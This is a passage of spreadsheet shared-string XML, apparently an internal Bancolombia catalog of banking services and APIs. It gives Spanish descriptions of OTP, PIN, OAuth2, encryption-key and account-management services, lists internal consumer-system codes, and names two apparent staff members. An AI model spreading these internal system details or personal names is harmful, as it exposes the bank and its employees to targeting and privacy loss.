  <si>
    <t>AW1333002_FraudEvaluation _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Fund Administration</t>
  </si>
  <si>
    <t>Fund Administration - Consolidated Balances</t>
  </si>
  <si>
    <t>fund-administration-consolidated-balances</t>
  </si>
  <si>
    <t>Esta API permite consultar el saldo consolidado de los fondos de inversión colectiva de un cliente.</t>
  </si>
  <si>
    <t>ConsultaFondos/V2.0</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208 _x000D_
 Inversi_NU0160001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 JornadaDepositos_AW1177001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 ALM_AW0955001</t>
  </si>
  <si>
    <t>Fund Administration - Information</t>
  </si>
  <si>
    <t>fund-administration-information</t>
  </si>
  <si>
    <t>La API permite consultar la información de un fondo de inversión, ya sea de Valores o Fiduciaria del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>ConsultaFondos/V1.0</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Permite consultar la información de un fondo de inversión colectiva (Valores o Fiduciaria) del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>Fund Administration - Management</t>
  </si>
  <si>
    <t>fund-administration-management</t>
  </si>
  <si>
    <t>Esta API permitirá a los consumidores realizar la administración de los Fondos de Inversión Colectiva (Fiduciaria, Valores) Grupo Bancolombia.</t>
  </si>
  <si>
    <t>Fund Administration - Transactions</t>
  </si>
  <si>
    <t>fund-administration-transactions</t>
  </si>
  <si>
    <t>La API permite consultar los movimientos detallados de los fondos de inversión del Grupo Bancolombia, ya sea de Valores o Fiduciaria.</t>
  </si>
  <si>
    <t>Fund Administration - Transfers</t>
  </si>
  <si>
    <t>fund-administration-transfers</t>
  </si>
  <si>
    <t>La API Fund Administration - transfers permitirá a los consumidores realizar operaciones de transferencias de fondos de inversión colectiva.</t>
  </si>
  <si>
    <t>TransferenciasFondosDeInversion/V1.0</t>
  </si>
  <si>
    <t>Generacion PIN</t>
  </si>
  <si>
    <t>La operación que incluye este servicio le permite a un cliente generar el PIN (clave de acceso) el cual le permite autenticarse en el uso de los diferentes canales electrónicos del Banco.</t>
  </si>
  <si>
    <t>Generacion Token</t>
  </si>
  <si>
    <t>Servicio que hace uso de la capacidad de generación de PINES del iSeries, el token generado se podrá enviar al correo electrónico o como mensaje de texto ( SMS) al celular del individuo que se desea autenticar.</t>
  </si>
  <si>
    <t xml:space="preserve">
PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
NU0034001 _x000D_
AW1097001 _x000D_
AW0638 _x000D_
NU0127001 _x000D_
AW1206001 _x000D_
AW1170 _x000D_
NU0104001 _x000D_
NU0014001 _x000D_
AW1165 _x000D_
NU0004001 _x000D_
AW1287 _x000D_
AW1150 _x000D_
AW1128 _x000D_
AW1312001 _x000D_
AW0955 _x000D_
AW0939 _x000D_
AW1011 _x000D_
AW0638001 _x000D_
DEVELOPSOATEST _x000D_
AW0955001 _x000D_
AW1203001 _x000D_
AW1316 _x000D_
NU01270012 _x000D_
NU0046001 _x000D_
AW0660 _x000D_
AW1435001 _x000D_
AW1299001 _x000D_
NU0204001</t>
  </si>
  <si>
    <t>Generar Codigo Seguridad</t>
  </si>
  <si>
    <t>Este servicio implementa la funcionalidad para generar el código de seguridad en IAM y enviarlo a través del Componente de Alertas al cliente, permitiéndole así generar su clave principal.</t>
  </si>
  <si>
    <t>Generar OTP</t>
  </si>
  <si>
    <t xml:space="preserve"> Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x005F_x000D_ _x005F_x000D_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x005F_x000D_ _x005F_x000D_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x005F_x000D_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP.</t>
  </si>
  <si>
    <t>Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID.
 El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP.
 El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente.
 Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP.</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
NU0004001 _x000D_
AW1287 _x000D_
AW1128 _x000D_
AW1185001 _x000D_
DEVELOPSOATEST _x000D_
NU0100001 _x000D_
AW1316001 _x000D_
AW1277001 _x000D_
NU0199001</t>
  </si>
  <si>
    <t>Gestion Alertas y Notificaciones</t>
  </si>
  <si>
    <t>Para la comunicación de las transacciones realizadas por un usuario Bancolombia, se provee el servicio de Alertas y Notificaciones, el cual consiste en el envío de una notificación a los medios que el usuario haya autorizado al momento de inscribirse. Esta notificación hará referencia a la los temas que al cliente se le haya configurado previamente en el paquete de alertas en su inscripción al sistema o que él mismo haya personalizado en la Sucursal Virtual Personas o sucursal física. Estas notificaciones incluyen notificar los débitos de las cuentas de ahorro, cuentas de crédito, entre otras.  Con el presente servicio inicialmente se pretende realizar la inscripción en tiempo real al sistema y se hará una vez el cliente se haya vinculado y aperturado un producto en Bancolombia. Dado que un usuario podría inscribirse entregando solo número de celular o solo correo electrónico o los datos, se crean dos operaciones indicando a que tipo de notificación se suscribe el usuario.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1128 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Gestion Anexo Cinco</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio GestionAnexoCinco V1.0, permitirá a los canales digitales, generar el anexo5 del servicio digital y el anexo5 de restructuraciones y reservas que se realicen manualmente por el portal transaccional para poder realizar el registro de la garantía ante el Fondo Nacional de Garantias. </t>
  </si>
  <si>
    <t>Gestion Archivo Recaudo</t>
  </si>
  <si>
    <t>El servicio Gestión Archivo Recaudo permite gestionar los archivos del recaudador, como su anulación</t>
  </si>
  <si>
    <t>Gestion Autenticacion Fuerte</t>
  </si>
  <si>
    <t>El servicio permite gestionar el proceso de enrolamiento de un cliente al sistema de autenticación fuerte de Bancolombia.</t>
  </si>
  <si>
    <t>AutenticacionFuertes</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
AW1287 _x000D_
AW0856 _x000D_
AW1313 _x000D_
AW0638 _x000D_
AW1170 _x000D_
AW1128 _x000D_
AW1203001</t>
  </si>
  <si>
    <t>Gestion Autenticacion OAuth2</t>
  </si>
  <si>
    <t>Este servicio es el encargado de la gestión de autenticación Oauth2.0 configurado en WAS, en esta primera versión se tiene la operación cambiarCodigoAutorizacionPorToken que será la encargada de intercambiar el código de autorización por el token de acceso y en posteriores versiones se agregarán funcionalidades respecto a la autenticación OAuth2.0.&amp;</t>
  </si>
  <si>
    <t>AW1281002 _x000D_
NU0021001 _x000D_
NU0143001 _x000D_
NU0104001 _x000D_
AW1333002 _x000D_
AW1190001 _x000D_
AW0453001 _x000D_
NU0004001 _x000D_
AW1128 _x000D_
APICONNECT _x000D_
AW1281003 _x000D_
NU0035001 _x000D_
AW1218001 _x000D_
NU0046001 _x000D_
AW1291001 _x000D_
NU0094001 _x000D_
NU0162001 _x000D_
AW1277001 _x000D_
DEVELOPSOATEST _x000D_
NU0170001 _x000D_
NU0199001 _x000D_
AW1435001</t>
  </si>
  <si>
    <t>Gestion Beneficiario</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Gestión Beneficiario permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará. </t>
  </si>
  <si>
    <t>Gestion Clasificacion Riesgo</t>
  </si>
  <si>
    <t>Permite consultar la validación de las reglas LAFT a las personas o empresas que desean adquirir un producto o un servicio del Grupo Bancolombia, para garantizar un adecuado conocimiento de estos y cumplir con la normatividad expedida por la Superintendencia Financiera de Colombia y la normatividad SARLAF para identificar si esta persona es un potencial cliente del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>AW0611001</t>
  </si>
  <si>
    <t>Gestion Clave Cliente</t>
  </si>
  <si>
    <t>El servicio tiene como alcance la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. Dentro de sus operaciones considera: una capacidad para el bloqueo de clave, otra para la consulta de novedades de cambio de clave y una última que se adiciona en esta nueva versión del servicio para consultar el estado y la existencia de clave banco.</t>
  </si>
  <si>
    <t>PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008</t>
  </si>
  <si>
    <t>AW1170 _x000D_
DEVELOPSOATEST _x000D_
AW1185001 _x000D_
NU0021001</t>
  </si>
  <si>
    <t>Gestion Cliente</t>
  </si>
  <si>
    <t>El servicio permite la creación y modificación de la información del cliente directamente en maestro de clientes del banco (MDM). Un proyecto que consuma el servicio puede crear un nuevo cliente en MDM, para la creación puede asignar información de atributos del cliente como lo son: Datos personales, datos de contacto, datos comerciales, datos de las relaciones del cliente, datos financieros y datos tributarios, así mismo un proyecto podrá modificar/actualizar la información de un cliente existente en el maestro da clientes del banco. Este servicio aplica tanto para persona jurídica, como para persona natural.  Este servicio no realiza la función de vinculación o desvinculación de clientes en el banco, este servicio se encuentra disponible es para la creación o modificación de clientes en MDM. Cuando un cliente es creado o actualizado a través de este servicio, será información que se convertirá en registro de oro del cliente, lo cual indica que podrá ser consultada por otros consumidores a través de los servicios de MDM de consulta del cliente. Cuando el cliente es creado o modificado en MDM se sincronizará en tiempo real con CRM y CIF.</t>
  </si>
  <si>
    <t>AW1074001 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Gestion Cliente Giros</t>
  </si>
  <si>
    <t>GestionClienteGiros ofrece a sus consumidores la posibilidad de consultar, actualizar y registrar un cliente en la aplicación de giros.</t>
  </si>
  <si>
    <t>BALM</t>
  </si>
  <si>
    <t>Monica Cecilia Gallego Rengifo</t>
  </si>
  <si>
    <t>GIR-Giros Nacionales Multicanal_ISGIR001</t>
  </si>
  <si>
    <t>Gestion Cliente Leasing</t>
  </si>
  <si>
    <t>El servicio Gestión Cliente Leasing permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing.</t>
  </si>
  <si>
    <t>Gestion Cliente Pagador</t>
  </si>
  <si>
    <t>El servicio Gestión Cliente Pagador permitirá realizar gestión sobre sus pagadores, la inscripción de un cliente pagador realizada a partir del nit y la consulta del cliente pagador, donde se podrán visualizar todos los parámetros de su inscripción.</t>
  </si>
  <si>
    <t>Gestion Cliente Pago Nomina</t>
  </si>
  <si>
    <t>El servicio GestionClientePagoNomina permite a las pequeñas y grandes empresas, realizar su inscripción de cliente (persona natural o jurídica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina.</t>
  </si>
  <si>
    <t>Gestion Cliente Valores</t>
  </si>
  <si>
    <t>El servicio GestionClienteValores permitirá a los consumidores realizar la creación de nuevos clientes en valores y/o modificar la información de un cliente ya existente.</t>
  </si>
  <si>
    <t>Gestion Codigo Autorizacion</t>
  </si>
  <si>
    <t xml:space="preserve">El código de autorización garantiza que un cliente se autenticó de forma exitosa.
Este servicio permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar de dos formas; usando las credenciales cifradas del cliente (Cuando el Cliente se autentica) o a partir de un token existente (Single Sign ON) este último ocurre cuando se delega la sesión a un nuevo consumidor. 
</t>
  </si>
  <si>
    <t>AW1281002 _x000D_
AW1128 _x000D_
AW0955 _x000D_
NU0051001 _x000D_
AW0955001 _x000D_
AW1291001 _x000D_
AW1170 _x000D_
DEVELOPSOATEST _x000D_
NU0170001 _x000D_
AW1435001 _x000D_
NU0034001</t>
  </si>
  <si>
    <t>Gestion Codigos Comercio Adquirencia</t>
  </si>
  <si>
    <t>El servicio Gestión Códigos Comercio Adquirencia permitirá consultar y actualizar códigos de comercio únicos a nivel nacional y consultar radicados de solicitudes de afiliación para las tres franquicias Visa, Mastercard y Amex.</t>
  </si>
  <si>
    <t>ADQUIRENCIA MEDIOS DE PAGO_ISADQ0001</t>
  </si>
  <si>
    <t>AW0856</t>
  </si>
  <si>
    <t>Gestion Comercios Adquirencia</t>
  </si>
  <si>
    <t>El servicio Gestión Comercios Adquirencia permitirá a los consumidores inicialmente consultar y actualizar información de los comercios afiliados al producto adquirencia.</t>
  </si>
  <si>
    <t>Gestion Comision Transferencias Externas</t>
  </si>
  <si>
    <t>El servicio Gestion Comision Transferencias Externas tiene como objetivo realizar funcionalidades propias relacionadas con las comisiones que se cobran al momento de realizar una transferencia internacional para filiales del exterior.</t>
  </si>
  <si>
    <t>Gestion Comisiones Filiales</t>
  </si>
  <si>
    <t>Este servicio tiene como objetivo obtener una comisión en específico. Se toman en cuenta todas las comisiones que se manejan en las Filiales del Exterior.</t>
  </si>
  <si>
    <t>Gestion Conciliacion Clientes</t>
  </si>
  <si>
    <t>El servicio GestionConciliacionClientes, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia.</t>
  </si>
  <si>
    <t>AW1294001 _x000D_
NU0021001 _x000D_
Allus</t>
  </si>
  <si>
    <t>Gestion Cuenta Fly Pass</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio GestionCuentaFlyPass tiene como Objetivo alojar algunas operaciones, que son necesarios para exponer una funcionalidad a la iniciativa de Recaudo Electrónico Vehicular, la cual expondrá la funcionalidad desde Data Power.</t>
  </si>
  <si>
    <t>AW1150</t>
  </si>
  <si>
    <t>Gestion Cuentas ACH</t>
  </si>
  <si>
    <t>El servicio Gestión Cuentas ACH tiene como objetivo realizar funcionalidades propias con las cuentas ACH que no tienen que ver con afectación monetaria, tales como inscripción de cuentas ACH, consultas de cuentas ACH, etc.</t>
  </si>
  <si>
    <t>Gestion Cuentas AFC</t>
  </si>
  <si>
    <t xml:space="preserve">Las operaciones de este servicio son las que permiten hacer notificaciones al aplicativo AFC (caso de la apertura de la cuenta AFC en Finacle), o disminuir la operatividad del cajero en la oficina (caso de la grabación del Pate). </t>
  </si>
  <si>
    <t>BVD _x000D_
AW0210001 _x000D_
AFC _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Gestion Cuentas Deposito</t>
  </si>
  <si>
    <t>El servicio Gestión Cuentas Deposito tiene como objetivo realizar funcionalidades propias con las cuentas de Depósitos, que no tienen que ver con afectación monetaria, tales como inscripción de cuentas, consultas de cuentas, etc.</t>
  </si>
  <si>
    <t>Gestion Cuentas Depositos</t>
  </si>
  <si>
    <t>El servicio permite la gestión (creación/modificación/eliminación) de cuentas de ahorro/corriente.</t>
  </si>
  <si>
    <t xml:space="preserve">Leidy Yurany Guarin Lopez </t>
  </si>
  <si>
    <t>AFC _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Gestion Datos Cliente Sufi</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite la actualización, creación de los datos generales de un cliente en sufi y otras operaciones relacionadas con la administración de los datos del cliente para esta versión solo queda especificada para la actualización de la información general. </t>
  </si>
  <si>
    <t>AW1312001</t>
  </si>
  <si>
    <t>Gestion De Archivos</t>
  </si>
  <si>
    <t>El servicio tiene varias funcionalidades, la primer es realizar la consulta del estado de un archivo enviado por un cliente para determinado convenio, la segunda permitirá realizar la visualización del detalle del archivo enviado por el cliente de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.), y la tercera funcionalidad es la de anulación de un lote (archivo) completo por parte del cliente, de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.).</t>
  </si>
  <si>
    <t>AW01065 _x000D_
GDE _x000D_
SVE</t>
  </si>
  <si>
    <t>Gestion De Bolsillos</t>
  </si>
  <si>
    <t>Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El Servicio GestionDeBolsillos habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorros como, por ejemplo, crear o cancelar un bolsillo.</t>
  </si>
  <si>
    <t>Gestion De Cuentas</t>
  </si>
  <si>
    <t>El servicio GestionDeCuentas permite efectuar diversas operaciones sobre las cuentas de un cliente en su relación con el Banco.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
NU0104001 _x000D_
AW1128 _x000D_
AW1108001 _x000D_
NU0170001</t>
  </si>
  <si>
    <t>Gestion De Cuentas Depositos</t>
  </si>
  <si>
    <t>El Servicio Gestión De Cuentas Depósitos habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura, cancelación, el bloqueo o desbloqueo de saldos de una cuenta en particular y la validación de pertinencia entre un cliente y una cuenta</t>
  </si>
  <si>
    <t>AW0360010 _x000D_
NU0146001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0135001</t>
  </si>
  <si>
    <t>Gestion De Divisas</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permitirá realizar la compra y venta de divisas con unas validaciones previas, se realizará la productización con el fin de permitir el consumo desde cualquier canal. </t>
  </si>
  <si>
    <t>Gestion De Facturas</t>
  </si>
  <si>
    <t>El servicio Gestión Facturas permitirá realizar gestión sobre sus facturas, podrá realizar la inscripción y la actualización.</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
DEVELOPSOATEST _x000D_
NU0084001 _x000D_
NU0051001</t>
  </si>
  <si>
    <t>Gestion De Pagos</t>
  </si>
  <si>
    <t>El servicio Creación Pago permitirá la creación de un pago, proceso uno a uno. El pago deberá ser incluido al producto pagos como un lote, debe ser una cuenta origen Bancolombia y el destinatario podrá ser mismo banco u otros</t>
  </si>
  <si>
    <t>Gestion De Topes Montos Clientes</t>
  </si>
  <si>
    <t>Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día.   Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas.</t>
  </si>
  <si>
    <t>NU0014001 _x000D_
AW1300001 _x000D_
AW0955 _x000D_
DEVELOPSOATEST _x000D_
AW1277001</t>
  </si>
  <si>
    <t>DEVELOPSOATEST _x000D_
DEVELOPSOATESTMQ _x000D_
AW0955001 _x000D_
AW1277001 _x000D_
NU0151001</t>
  </si>
  <si>
    <t>Gestion Debito Automatico</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes canales de Bancolombia realizar la inscripción, consulta, modificación y eliminación del débito automático de una cuenta de ahorros, corriente o tarjeta de crédito.</t>
  </si>
  <si>
    <t>SCI _x000D_
SVP _x000D_
GDE _x000D_
APP _x000D_
SVE</t>
  </si>
  <si>
    <t>Gestion Desembolso Credito Pyme</t>
  </si>
  <si>
    <t>El servicio Gestion Desembolso Credito Pyme, permite gestionar el proceso de desembolso que se encuentra orquestado por Bizagi, permitiendo la creación del desembolso, aceptación de una oferta y por ultimo aceptación del desembolso como tal.</t>
  </si>
  <si>
    <t>Gestion Divisas</t>
  </si>
  <si>
    <t>El servicio Gestión Divisas tiene como objetivo realizar funcionalidades propias con las divisas como compra y venta de divisas o reversión de una compra o venta de divisas.</t>
  </si>
  <si>
    <t>Gestion Exoneraciones Tarjeta Debito</t>
  </si>
  <si>
    <t>La necesidad de la creación surge de con la iniciativa de tener gestión sobre el concepto de exoneraciones. El servicio permite consultar, eliminar o grabar una exoneración en la tarjeta del cliente, operaciones aplicadas a las tarjetas débito.</t>
  </si>
  <si>
    <t>Gestion Externa Documental</t>
  </si>
  <si>
    <t>Este servicio presenta a los clientes consumidores un esquema de seguridad para acceder a los servicios de negocio del Banco asociados a Gestión Documental. Garantiza el firmado y cifrado de la información enviada e implementa mecanismos de filtrado a nivel de comunicaciones para autorizar a los proveedores integrales de servicio que lo consumen.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1313001 _x000D_
AW0638 _x000D_
AW1128 _x000D_
DataFile _x000D_
Carvajal _x000D_
AW1011 _x000D_
AW1203001 _x000D_
ISFID0023</t>
  </si>
  <si>
    <t>Gestion Facturas</t>
  </si>
  <si>
    <t>Transacción encargada de realizar la inscripción de facturas , se valida si el usuario posee algún tipo de Conevnio para su activación directa, en caso de que el convenio maneje Delay se hara unas prevalidaciones de seguridad y quedara en estado pendiente, las facturas que quedaran activas las manejara Finacle. En la transacción se recibe el código del convenio, el documento, y datos necesarios para su ejecución.</t>
  </si>
  <si>
    <t>Gestion Fondos Fiduciarios</t>
  </si>
  <si>
    <t>Este servicio tiene como objetivo ejecutar operaciones transaccionales de los fondos de inversión colectiva administrado por la fiduciaria tales como Adiciones, cancelaciones, retiros y constituciones para el producto de InvesBot.</t>
  </si>
  <si>
    <t>Gestion Fraude Crediticio</t>
  </si>
  <si>
    <t>El servicio GestionFraudeCrediticio es un apoyo a los procesos de validaciones de solicitudes crediticias, en el cual los consumidores podrán validar posibles indicios de fraude por parte del solicitante   de un producto en el proceso de originación u obtener alertas si el solicitante ya cometió un fraude en otra entidad financiera.</t>
  </si>
  <si>
    <t>Gestion Garantias Banco FNG</t>
  </si>
  <si>
    <t>Este servicio permite la radicación del tipo de garantía Fondo Nacional de Garantías el cual previamente se tuvo que haber registrado en el FNG. Para posteriormente realizar su matricula en el Iseries del banco.</t>
  </si>
  <si>
    <t>Gestion Garantias Fondo Nacional</t>
  </si>
  <si>
    <t>El servicio Gestión Fondo Nacional Garantías permite reservar y registrar una garantía en el Fondo Nacional. Para posteriormente asociarla a una obligación</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
AW0856 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Gestion Giro Multicanal</t>
  </si>
  <si>
    <t>GestionGiroMulticanal ofrece a sus consumidores la posibilidad de operar todo lo relacionado con los giros en los distintos canales ofrecidos por el banco.</t>
  </si>
  <si>
    <t>Gestion GMF</t>
  </si>
  <si>
    <t>El Servicio GestionGMF habilita las capacidades que permite agregar o eliminar el beneficio de Gravamen a los Movimientos Financieros (GMF) de cuentas de ahorro, corriente o de depósitos para un cliente en particular.</t>
  </si>
  <si>
    <t>Gestion Interna Documental</t>
  </si>
  <si>
    <t>AW1177 _x000D_
NU0034001 _x000D_
AW1176 _x000D_
AW0856 _x000D_
AW0638 _x000D_
AW1258002 _x000D_
AW1133 _x000D_
AW0659 _x000D_
AW1315001 _x000D_
AW1203001 _x000D_
NU0015</t>
  </si>
  <si>
    <t>Gestion Inversiones</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite al cliente realizar la Activación, desactivación y Cancelación de una inversión virtual, en cualquier momento siempre y cuando la inversión virtual no se encuentre en periodo de gracia. </t>
  </si>
  <si>
    <t>CDT _x000D_
NU0014001 _x000D_
SVE _x000D_
DEVELOPSOATEST _x000D_
NU0153001 _x000D_
NU0146001 _x000D_
NU0149001</t>
  </si>
  <si>
    <t>Gestion Leasing Financiero</t>
  </si>
  <si>
    <t>El servicio Gestión Leasing Financiero permitirá la creación de condiciones de Leasing financiero por activo de negocio.  Las condiciones de un leasing financiero incluyen la información del solicitante, el activo, montos, tasas, seguros, opción de compra, proveedor del activo, avalistas de la operación, entre otros.</t>
  </si>
  <si>
    <t>Gestion Limite</t>
  </si>
  <si>
    <t>El servicio permite realizar la administración de los límites máximos de endeudamiento para una persona natural.</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW0856 _x000D_
AW1128</t>
  </si>
  <si>
    <t>El servicio GestionLimite permite realizar la administración de los límites máximos de endeudamiento para una persona natural. Inicialmente, contará con la operación crearLimite pero el objetivo es que a futuro se agreguen nuevas operaciones que permitan consultar y eliminar un límite. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo.</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
AW0856 _x000D_
AW1170 _x000D_
AW1287 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Gestion Limites De Endeudamiento</t>
  </si>
  <si>
    <t>Versión Inicial del Servicio Gestión Limites de Endeudamiento de la EVC Ciclo de Crédito, que cuenta con la capacidad de fijar el limite global de Endeudamiento para un cliente, así como crear el sublímite de endeudamiento para una línea de crédito especifica.</t>
  </si>
  <si>
    <t>Gestion Listas De Control</t>
  </si>
  <si>
    <t>Este servicio tiene la capacidad de ingresar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
NU0034001 _x000D_
AW1128</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permitirá ingresar un usuario a una lista de control, eliminarlo de una lista o realizar estas mismas operaciones de forma masiva a través de la carga de un archivo. </t>
  </si>
  <si>
    <t>Gestion Llave Cifrado</t>
  </si>
  <si>
    <t>El servicio permite a los consumidores obtener la llave de cifrado con la cual se encriptan las credenciales de acceso (clave) de los clientes a los diferentes canales del banco.</t>
  </si>
  <si>
    <t>AW0955 _x000D_
NU0051001 _x000D_
AW0955001 _x000D_
AW1185001 _x000D_
AW1291001 _x000D_
AW1170 _x000D_
DEVELOPSOATEST _x000D_
NU0034001</t>
  </si>
  <si>
    <t>Gestion Notificaciones Push</t>
  </si>
  <si>
    <t>Este servicio permitirá la implementación de las nuevas capacidades requeridas para las aplicaciones que usarán el segundo factor de autenticación Push.
El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción.</t>
  </si>
  <si>
    <t>APIC _x000D_
AW0856 _x000D_
AW1071001 _x000D_
NU0100001</t>
  </si>
  <si>
    <t>Gestion Obligaciones Sufi</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Gestión Obligaciones de Sufi permitirá a los consumidores ejecutar todo tipo de operaciones relacionadas con la administración de las obligaciones del cliente desde su originación hasta su desembolso, este servicio se hace para el contexto y todos los procesos de negocio de sufi. Este servicio tiene como primer consumidor APM, siendo el motor de decisión de sufi. </t>
  </si>
  <si>
    <t>AW1097001 _x000D_
ISSU20003 _x000D_
AW1134001</t>
  </si>
  <si>
    <t>Gestion Ordenes</t>
  </si>
  <si>
    <t>El servicio Gestión Ordenes permitirá consultar las ordenes que tiene disponible el cliente para realizar negociación de divisas.</t>
  </si>
  <si>
    <t>Gestion Otp Pagos</t>
  </si>
  <si>
    <t>Este servicio permite el reenvió de la OTP almacenada en el sistema de pagos al beneficiario, No se tendrá acceso al OTP y el servicio se encargara de enviar la notificación al backend para que este envié al numero de móvil que suministro el pagador al realizar la dispersión del archivo de pagos.</t>
  </si>
  <si>
    <t>Gestion Pago En Efectivo</t>
  </si>
  <si>
    <t>Este Producto API permite la gestión de pagos en efectivo por Corresponsal Bancario; a través de las operaciones construidas en esta API, se podrá ejecutar el pago a un beneficiario y se podrá realizar la anulación de una pago (Por errores como TimeOut o desconexión de la red).</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1151001</t>
  </si>
  <si>
    <t>Gestion Pago Leasing</t>
  </si>
  <si>
    <t>Servicio encargado de acreditar los pagos para el proyecto de transformación digital</t>
  </si>
  <si>
    <t>Gestion Pago Programado</t>
  </si>
  <si>
    <t>Se ha creado version para agregar dos operaciones, crear y actualizar programación de pago</t>
  </si>
  <si>
    <t>Gestion PQRS</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio GestionPQRS permitirá a los consumidores crear, modificar y consultar los casos de petición, quejas o reclamos en el sistema de almacenamiento de PQRS. </t>
  </si>
  <si>
    <t>NU0010001 _x000D_
AW1218001 _x000D_
DEVELOPSOATEST _x000D_
NU0150001</t>
  </si>
  <si>
    <t>Gestion Precalculado Cliente</t>
  </si>
  <si>
    <t>El servicio permite gestionar la base de datos de productos pre-calculado para los clientes, habilitando su consulta desde los diferentes canales y actualización de estado cuando el producto se haya entregado al cliente.</t>
  </si>
  <si>
    <t>BD Grupo de Riesgos</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0937 _x000D_
ELIBOM _x000D_
AW0856 _x000D_
SVP _x000D_
AW1128 _x000D_
